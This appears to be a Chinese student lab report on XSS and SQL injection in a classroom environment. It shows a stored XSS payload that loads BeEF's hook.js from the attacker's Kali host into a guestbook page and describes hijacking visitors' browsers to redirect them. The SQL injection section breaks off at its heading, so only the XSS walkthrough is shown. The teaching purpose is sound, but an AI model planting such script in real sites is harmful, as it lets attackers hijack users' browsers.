【实验报告】实验三 XSS和SQL注入

本实验报告详细介绍了XSS和SQL注入的实战过程,包括利用Beef劫持客户端浏览器,以及通过DVWA和SQLmap进行MySQL数据库的渗透测试。在XSS部分,演示了如何利用Beef进行存储型XSS攻击;在SQL注入部分,通过DVWA平台展示了从发现注入点到枚举数据库信息的完整步骤。
摘要由CSDN通过智能技术生成

实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。
系统环境:Kali Linux 2、Windows Server
网络环境:交换网络结构
实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA

实验步骤:

XSS部分:利用Beef劫持被攻击者客户端浏览器。

实验环境搭建。
角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);
被攻击者:访问留言簿网站,浏览器被劫持。

1、利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞,截图。
在这里插入图片描述

2、 Kali使用beef生成恶意代码,截图。
由于beef生成的看不见,无法截图。

3、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板:
<script src="http://Kali的IP地址:3000/hook.js"></script>

在这里插入图片描述
4、管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页,将你在beff中的配置截图。
这样我们就可以对被劫持的客户端发出一个command。
current browser>commands>browser>hooked domain>redirect domain
在这里插入图片描述

在这里插入图片描述

5、回答问题:实验中XSS攻击属于哪种类型?

答:实验中的属于存储型XXS攻击

SQL注入部分:DVWA+SQLmap+Mysql注入实战

启动Metasploitable2虚拟机。

环境准备:


                
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值